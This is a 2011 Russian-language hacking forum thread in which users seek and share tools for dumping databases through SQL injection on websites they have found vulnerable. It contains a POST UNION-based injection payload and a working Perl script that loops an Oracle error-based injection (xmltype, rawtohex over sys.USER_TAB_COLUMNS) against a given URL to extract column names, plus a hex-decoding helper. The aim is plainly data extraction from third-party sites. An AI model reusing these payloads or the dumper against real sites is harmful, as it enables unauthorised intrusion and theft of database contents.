многопоточный Дампер на PERL через POST

Discussion in 'PHP' started by YuNi|[c, 31 Jan 2011.

  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    привет всем кодерам.
    Есть скул по POST запросу вида:
    Code:
    http://site.com/i.php 
    POST 
    param1=a1&param2=a2'+UNION+ALL+SELECT+1111,2222,3333,(SELECT concat(0x7e,0x27,unhex(Hex(cast(mytable.mycol as char))),0x27,0x7e) FROM `my_db`.mytable WHERE mytable.mycol=blablabla Order by mycol LIMIT 10,1)--+a
    Вопрос есть ли какой нит многопоточный дампер который если задать тока LIMIT $X,1 смог дампит с нескольками потоками?
    Пробовал с rsaundamper но оно не дампит с пост запросами ((

    PS.прошу извинит так как пока не умею кодит на перл даже простую сорец
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://rdot.org/forum/showthread.php?t=1142
     
    1 person likes this.
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    привет бро, я конечно уважаю что ты сделал такой крупный проект. Я раньше всегда сливал с тулзой, но в последнее время тулза веде себя не корректно и даже стандартные скули на mysql5 не может слит пишет example.com вместо самого сайта и вырубается.
    Тем более туда не впустиш то что я давал сверху пример, тут как то по другому.
    Я спросил обычный дампер как на универсальный дампер rsaUndumper но который может работат с пост запросом тоже((

    тут имеет место именно concat(0x7e,0x27,unhex(Hex(cast(mytable.mycol as char))),0x27,0x7e) даже если слит одну колонку с конкатенаций
    что не справляется тулза
     
    #3 YuNi|[c, 31 Jan 2011
    Last edited: 31 Jan 2011
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    хех думал тут разжел кодинга и даже если нет такого универсального брутера то кто нит запросто может наколбасит пару строк на perl((
     
  5. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Прошу помощи

    Нашел на сайте SQL inject, но данные выводятся только в виде ошибки, и их очень много а времени перебирать их нету. Встал вопрос автоматизировать как то это дело. И решил что давно пора изучать язык, остановился на Perl. Примерно за час написал скрипт.
    Code:
    #! /bin/usr/perl
    
    use LWP::Simple;
     if (@ARGV<1)
     {
    	print "Enter URL\n";
     }
     my $url=$ARGV[0];
     for ($i=1; $i<= 10; $i++)
     {
     my $lib1="+and(1)=(select+upper(xmltype(chr(60)||chr(58)||chr(58)||(select+rawtohex(column_name)from(select+column_name,rownum+rnum+from+sys.USER_TAB_COLUMNS+a)where+rnum=";
     my $lib2=")||chr(58)||chr(58)||chr(62)))from dual)--+";
     my $urlsql=$url.$lib1.$i.$lib2;
     my $content=get $urlsql;
     open (FILE, "> res.txt");
     print FILE $content;
     close (FILE);
     open (FILE, "res.txt");
     while (<FILE>)
    	{
    	($rescont,$column,$data)=split('::');
    	if ($column!=null)
    	{
    	print "$column +";
    	}
    	}
     close (FILE);
     }
    
    Знаю что каряво и не правильно, но он выводит первые 10 колонок. Внимание вопрос!!!!!
    Как правильно написать, и как его оптимизировать. Новую тему создавать не стал. Прошу не флудить :)
     
  6. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    мультикурл + пхп тож сойдет
     
  7. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    С языком я уже определился. Вопрос по скрипту, как можно отсеять ненужные данные не сохраняя их в файл как у меня.
     
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Code:
    #! /bin/usr/perl
    
    Жуть =)
     
  9. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    В смысле, с учебника смотрел, и во многих скриптах так.
    Добавил в скрипт функцию:
    Code:
    sub hex_to_ascii ($)
       {
          (my $str = shift) =~ s/([a-fA-F0-9] {2})/chr(hex $1)/eg;
          return $str;
       }
    
    $column=hex_to_ascii($column);
    
    Не знаю так корректно или нет, но у меня работает.
    Попробую дальше проработать, может кому нибудь ещё пригодится, жду ваших советов.